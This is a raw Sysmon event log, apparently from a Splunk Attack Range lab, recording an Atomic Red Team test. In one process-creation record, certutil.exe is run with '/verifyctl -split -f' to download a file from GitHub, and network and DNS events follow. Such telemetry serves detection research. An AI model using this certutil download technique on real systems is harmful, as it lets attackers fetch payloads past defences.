21:49:42.321{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B3F6-605B-7969-00000000AE01}1632C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917482Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.320{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3F6-605B-7969-00000000AE01}1632C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917481Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.316{896A638B-B3F6-605B-7969-00000000AE01}16326716C:\Windows\system32\conhost.exe{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917480Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.296{896A638B-B8DD-6058-9202-00000000AE01}36324636C:\Windows\system32\csrss.exe{896A638B-B3F6-605B-7969-00000000AE01}1632C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917479Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.294{896A638B-B8DD-6058-9202-00000000AE01}36324724C:\Windows\system32\csrss.exe{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917478Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.291{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917477Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.291{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917476Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.291{896A638B-B5C8-6058-0500-00000000AE01}396512C:\Windows\system32\csrss.exe{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917475Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.291{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917474Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.291{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917473Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.290{896A638B-B3F6-605B-7769-00000000AE01}51966688C:\Windows\system32\wbem\wmiprvse.exe{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000005917472Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.291{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.exe"C:\Windows\System32\certutil.exe" /verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt C:\Windows\system32\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000005917471Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.288{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917470Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.288{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917469Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.262{896A638B-B5CB-6058-1600-00000000AE01}13086196C:\Windows\System32\svchost.exe{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917468Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.251{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917467Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.238{896A638B-B5C8-6058-0500-00000000AE01}396356C:\Windows\system32\csrss.exe{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917466Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.237{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917465Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.218{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917464Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.218{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917463Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.218{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638457Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:43.382{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80CEE64E71A665C46820641183CB6AC7,SHA256=0BE4FDF873ACE1C764314CDAC386F22687B0BEF53C9794057C538A8143300B49,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917514Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:43.727{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917513Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:43.727{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917512Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:43.452{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CD980C7F44B929D2FDA4416AB94B18D,SHA256=D27C8D6CB0C8C14F4DCCC026CA74CB92A5A353B94133DB67F6FA41F820C601E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917511Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:43.238{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6D4EAE61F5040DC8766BBF81D8273DE,SHA256=128069E03D8A10B241A0B8B2918AEADC64457FCCDF92FE8F61A9A05D3E71CA41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917510Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:43.205{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2C83E4D8D183941CB213E3869CDD6C38,SHA256=576CC521581C68148E45C7817CDE078988DCC61B887FF0B64F557FE1B6B384EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917520Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:44.870{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=092C9DC81A444AFD626D6697DB853654,SHA256=C8BEF5A66E1197613B7D374A9D0760D761B1CE388043998B9FC9E718DCB8E65F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917519Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:41.099{00000000-0000-0000-0000-000000000000}4944<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1500-false185.199.111.133cdn-185-199-111-133.github.com443https 10341000x80000000000000005917518Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:44.727{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917517Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:44.727{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917516Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:44.481{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=780F5F5FDB7F302C797BE89086BE1690,SHA256=7BC60EBAD72D6BBB6002BF3A9ED2719F5493F64A095ECC9030B606FBA757193E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638458Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:44.460{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DDC9B8B0B91D16E827559045BB9856A,SHA256=6A1966F4DCB1A1B9D35DD7819A411B4D2AFF5F65C1BEF7446A58E1464F8C8B65,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000005917515Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:41.104{00000000-0000-0000-0000-000000000000}4944raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.110.133;::ffff:185.199.109.133;<unknown process> 23542300x8000000000000000638461Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:45.476{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 